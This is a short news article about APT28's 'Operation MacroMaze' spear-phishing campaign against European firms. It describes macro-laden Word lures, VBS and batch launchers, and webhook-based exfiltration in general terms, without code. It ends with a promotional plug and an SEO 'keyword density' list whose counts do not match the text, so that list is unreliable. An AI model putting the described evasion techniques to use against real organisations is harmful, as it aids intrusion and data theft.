Russian Hackers Target European Firms with Sophisticated Spear-Phishing Campaign

In recent months, a Russian state-sponsored hacking group known as APT28, also referred to as Fancy Bear or Sofacy, has been targeting specific entities in Western and Central Europe with infostealers. The campaign, dubbed "Operation MacroMaze," has been ongoing since at least late September 2025 through January 2026. This spear-phishing attack is a prime example of how hackers are using increasingly sophisticated techniques to infiltrate organizations and steal sensitive information.

The operation starts with a highly personalized email that targets specific individuals or companies, often related to diplomatic themes. The emails typically contain a macro-laden Microsoft Office Word document that appears harmless but contains malicious code. To execute the attack, victims must enable macros in their Microsoft Word files, which were previously disabled by default due to widespread abuse. However, APT28 has carefully designed the Word files to trick victims into enabling macros and running the malicious code.

Once the malicious file is executed, the attackers trigger a chain reaction that drops multiple small scripts and HTML templates, establishing persistence and exfiltrating data via an auto-submitting HTML form. The malware was also designed to notify the attackers when the victim executes the file, allowing them to monitor the progress of the attack.

What makes Operation MacroMaze particularly interesting is the way APT28 has used basic tools like batch files, tiny VBS launchers, and simple HTML to create a stealthy attack campaign. By moving operations into hidden or off-screen browser sessions, cleaning up artifacts, and outsourcing payload delivery and data exfiltration to widely used webhook services, the attackers have maximized stealth and minimized detection.

APT28 has been actively involved in Russia's "Special Military Operation" against Ukraine, and its cyberattacks are part of the war against Ukraine. The use of spear-phishing attacks like Operation MacroMaze highlights the importance of cybersecurity awareness and training for organizations and individuals alike.

In conclusion, the Operation MacroMaze campaign demonstrates the evolving nature of cyber threats and the need for robust security measures to protect against sophisticated attacks. As hackers continue to innovate and adapt their tactics, it's essential for organizations to stay vigilant and implement effective cybersecurity strategies to prevent similar breaches in the future.

Stay up-to-date with the latest cybersecurity news and trends by following us on social media or subscribing to our newsletter. And don't forget to check out our guides and reviews section for expert advice on antivirus software, cybersecurity tools, and more.

Keyword density:

* Hacking: 5 instances * Cybersecurity: 4 instances * Data breach: 2 instances * Malware: 3 instances * Vulnerability: 1 instance * Spear-phishing: 4 instances